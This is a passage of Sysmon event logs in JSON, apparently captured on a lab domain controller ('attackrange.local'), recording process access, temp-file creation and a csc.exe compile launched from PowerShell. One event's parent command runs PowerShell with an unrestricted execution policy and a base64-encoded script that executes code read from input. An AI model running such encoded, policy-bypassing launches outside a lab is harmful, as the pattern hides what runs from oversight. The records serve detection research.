{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5362,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.775\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.775","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5363,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.775\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.775","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5364,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.775\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.775","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5365,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.775\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.775","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5366,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.775\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.775","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5367,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:14.775\r\nSourceProcessGUID: {E2A3D6B1-11D2-5F25-0000-001089BB0700}\r\nSourceProcessId: 2892\r\nSourceThreadId: 3144\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D2-5F25-0000-001053D70700}\r\nTargetProcessId: 4720\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:14.775","SourceProcessGUID":"{E2A3D6B1-11D2-5F25-0000-001089BB0700}","SourceProcessId":"2892","SourceThreadId":"3144","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D2-5F25-0000-001053D70700}","TargetProcessId":"4720","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5368,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:15.212\r\nProcessGuid: {E2A3D6B1-11D2-5F25-0000-00101DCB0700}\r\nProcessId: 4984\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\u3qddcyv.dll\r\nCreationUtcTime: 2020-08-01 06:55:15.212","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:15.212","ProcessGuid":"{E2A3D6B1-11D2-5F25-0000-00101DCB0700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\u3qddcyv.dll","CreationUtcTime":"2020-08-01 06:55:15.212","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5369,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.212\r\nProcessGuid: {E2A3D6B1-11D2-5F25-0000-00101DCB0700}\r\nProcessId: 4984\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\u3qddcyv.cmdline\r\nCreationUtcTime: 2020-08-01 06:55:15.212","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.212","ProcessGuid":"{E2A3D6B1-11D2-5F25-0000-00101DCB0700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\u3qddcyv.cmdline","CreationUtcTime":"2020-08-01 06:55:15.212","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5370,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.223\r\nProcessGuid: {E2A3D6B1-11D3-5F25-0000-001090DE0700}\r\nProcessId: 4108\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nFileVersion: 4.7.2053.0 built by: NET47REL1\r\nDescription: Visual C# Command Line Compiler\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: csc.exe\r\nCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\u3qddcyv.cmdline\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D2-5F25-0000-0020BBBA0700}\r\nLogonId: 0x7BABB\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52\r\nParentProcessGuid: {E2A3D6B1-11D2-5F25-0000-00101DCB0700}\r\nParentProcessId: 4984\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.223","ProcessGuid":"{E2A3D6B1-11D3-5F25-0000-001090DE0700}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","FileVersion":"4.7.2053.0 built by: NET47REL1","Description":"Visual C# Command Line Compiler","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"csc.exe","CommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\u3qddcyv.cmdline\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D2-5F25-0000-0020BBBA0700}","LogonId":"0x7babb","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52","ParentProcessGuid":"{E2A3D6B1-11D2-5F25-0000-00101DCB0700}","ParentProcessId":"4984","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 